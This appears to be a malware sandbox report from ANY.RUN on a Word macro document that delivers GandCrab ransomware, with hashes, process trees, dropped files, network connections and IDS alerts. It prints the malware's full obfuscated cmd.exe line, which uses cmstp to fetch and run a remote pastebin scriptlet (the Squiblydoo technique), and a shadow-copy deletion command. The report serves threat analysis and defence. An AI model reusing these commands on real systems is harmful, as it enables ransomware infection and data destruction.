analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

dbcfe476b667d5cc6d01120f22948df71c99e318c71963cdb9f8c6bdeac595a5.doc

Full analysis: https://app.any.run/tasks/f2b56789-cfa7-4389-b1e4-04423c7cb587
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: March 21, 2019, 07:16:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
squiblydoo
ransomware
gandcrab
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Wed Mar 20 07:20:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

4D1EED5145007C8C6A4BDA03ED5CF9B0

SHA1:

9B3024B92B60C7044224BB3B9F15E86DD3BF5E05

SHA256:

DBCFE476B667D5CC6D01120F22948DF71C99E318C71963CDB9F8C6BDEAC595A5

SSDEEP:

1536:dC/YRuBkL/o1uqyl9MUNCQu8YqFC0jI+koQ+a9:dCiuSZFW+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SQUIBLYDOO was detected

      • cmstp.exe (PID: 3536)
    • Application was dropped or rewritten from another process

      • 32192.exe (PID: 2728)
    • Writes file to Word startup folder

      • 32192.exe (PID: 2728)
    • Actions looks like stealing of personal data

      • 32192.exe (PID: 2728)
    • Dropped file may contain instructions of ransomware

      • 32192.exe (PID: 2728)
    • Deletes shadow copies

      • cmd.exe (PID: 4088)
    • Renames files like Ransomware

      • 32192.exe (PID: 2728)
    • Changes settings of System certificates

      • 32192.exe (PID: 2728)
    • Connects to CnC server

      • 32192.exe (PID: 2728)
    • GANDCRAB detected

      • 32192.exe (PID: 2728)
  • SUSPICIOUS

    • Creates files in the user directory

      • cmd.exe (PID: 2800)
      • cmstp.exe (PID: 3536)
      • 32192.exe (PID: 2728)
    • Executable content was dropped or overwritten

      • cmstp.exe (PID: 3536)
    • Creates files in the program directory

      • 32192.exe (PID: 2728)
    • Starts CMD.EXE for commands execution

      • 32192.exe (PID: 2728)
    • Reads the cookies of Mozilla Firefox

      • 32192.exe (PID: 2728)
    • Adds / modifies Windows certificates

      • 32192.exe (PID: 2728)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2304)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2304)
    • Dropped object may contain Bitcoin addresses

      • 32192.exe (PID: 2728)
    • Dropped object may contain TOR URL's

      • 32192.exe (PID: 2728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Admin
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Admin
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2019:02:28 14:52:00
ModifyDate: 2019:03:20 07:20:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company:
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs #SQUIBLYDOO cmstp.exe #GANDCRAB 32192.exe cmd.exe vssadmin.exe no specs vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2304"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dbcfe476b667d5cc6d01120f22948df71c99e318c71963cdb9f8c6bdeac595a5.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2800cmd /V /C set "d3=s" && !d3!et "d85=\" && !d3!et "d73=e" && !d3!et "d8=i" && !d3!et "d92=A" && !d3!et "d6=N" && !d3!et "d65=d" && c!d92!ll !d3!et "d1=%!d92!PP!d65!!d92!T!d92!%" && c!d92!ll !d3!et "d31=%R!d92!!d6!!d65!OM%" && !d3!et "d75=!d1!!d85!M!d8!cro!d3!oft!d85!T!d73!mplat!d73!s!d85!!d31!.txt" && !d3!et "d35="^" && (For %i in ("[v!d73!r!d3!ion]" "!d3!ignatur!d73!=$Wi!d6!dow!d3! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!d73!faultIn!d3!tall_Singl!d73!U!d3!er]" "UnR!d73!gi!d3!t!d73!rOCXs=d69" "[d69]" "%11%\%d2_1%%d2_2%%d2_3%,NI,%d_1%%d_2%%d_3%%d_4%%d_5%%d_6%%d_7%%d_8%%d_9%%d_10%%d_11%%d_12%%d_13%%d_14%%d_15%%d_16%" "[!d3!tring!d3!]" "d_1=ht" "d_2=tp" "d_3=:/" "d_4=/p" "d_5=as" "d_6=te" "d_7=bi" "d_8=n." "d_9=co" "d_10=m/" "d_11=ra" "d_12=w/" "d_13=Vz" "d_14=FY" "d_15=iL" "d_16=W9" "d2_2=rO" "d2_1=sC" "d2_3=bJ" ) do @echo %~i)>"!d75!" && echo !d3!erv!d8!ceNam!d73!=!d35! !d35!>>!d75! && echo !d3!hortSvcN!d92!me=!d35! !d35!>>!d75! && c!d92!ll !d3!et "d0=%WI!d6!!d65!IR%" && !d3!t!d92!rt "" !d0!!d85!Sy!d3!t!d73!m32!d85!cm!d3!tp.!d73!x!d73! /s /ns "!d75!"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3536C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\13549.txt"C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
2728"C:\Users\admin\AppData\Roaming\Microsoft\32192.exe" C:\Users\admin\AppData\Roaming\Microsoft\32192.exe
cmstp.exe
User:
admin
Integrity Level:
MEDIUM
4088"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quietC:\Windows\system32\cmd.exe
32192.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2640vssadmin delete shadows /all /quietC:\Windows\system32\vssadmin.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3280C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 299
Read events
1 186
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
420
Text files
323
Unknown types
18

Dropped files

PID
Process
Filename
Type
2304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8E5C.tmp.cvr
MD5:
SHA256:
2304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF81C564ABF038F732.TMP
MD5:
SHA256:
3536cmstp.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txttext
MD5:3FB643A8F59D29057DB772A7770C5217
SHA256:791E21E3D36F717B1D6CDB676D9A7E1C3F7F69D9EBF20CC8AFAB8AA7BC97E2C1
3536cmstp.exeC:\Users\admin\AppData\Roaming\Microsoft\32192.exeexecutable
MD5:871386F3D3C5DA785D57D319C065EDC6
SHA256:6B26D8254F3DB2DD7F36A0AE393DAA75964F175478C2272E021CBA621A78F8AA
2800cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\Templates\13549.txtini
MD5:B7F95296C60B65E9462873C1A574C231
SHA256:0FAEF1780382198F845BBC7A22E64DCEA9E0CF52FBB10A2CFBA39CA8E8BF5971
2304WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7AE6D6EAF471861752553ABA14261E5C
SHA256:157CD9D8E7B29FE7E097F8F5A4590364C82F2F85C6759D16C2805DB586B4DF9E
2304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$cfe476b667d5cc6d01120f22948df71c99e318c71963cdb9f8c6bdeac595a5.docpgc
MD5:DCB6E7D083210EEFD8FCB7CB29AFE570
SHA256:B0CFD32A608AD25B12112734586221E6E2D8119ECCDA84ACD37DA58B688415F0
272832192.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\ELQQM-MANUAL.txttext
MD5:4024D1C5A2ABB90B89BB917157B6C0C5
SHA256:B93F243F817922B2F851ABCC28C638C66C4E0EE781A87B8CA717757DCA4C2E5A
272832192.exeC:\PerfLogs\ELQQM-MANUAL.txttext
MD5:4024D1C5A2ABB90B89BB917157B6C0C5
SHA256:B93F243F817922B2F851ABCC28C638C66C4E0EE781A87B8CA717757DCA4C2E5A
272832192.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3536
cmstp.exe
GET
200
104.20.209.21:80
http://pastebin.com/raw/VzFYiLW9
US
xml
206 Kb
shared
2728
32192.exe
GET
301
107.173.49.208:80
http://www.kakaocorp.link/
US
html
162 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3536
cmstp.exe
104.20.209.21:80
pastebin.com
Cloudflare Inc
US
shared
2728
32192.exe
107.173.49.208:80
www.kakaocorp.link
ColoCrossing
US
malicious
2728
32192.exe
107.173.49.208:443
www.kakaocorp.link
ColoCrossing
US
malicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
www.kakaocorp.link
  • 107.173.49.208
malicious

Threats

PID
Process
Class
Message
3536
cmstp.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3536
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
2728
32192.exe
A Network Trojan was detected
MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
2728
32192.exe
A Network Trojan was detected
MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
2728
32192.exe
A Network Trojan was detected
MALWARE [PTsecurity] GandCrab v.5 SSL Connection
3 ETPRO signatures available at the full report
No debug info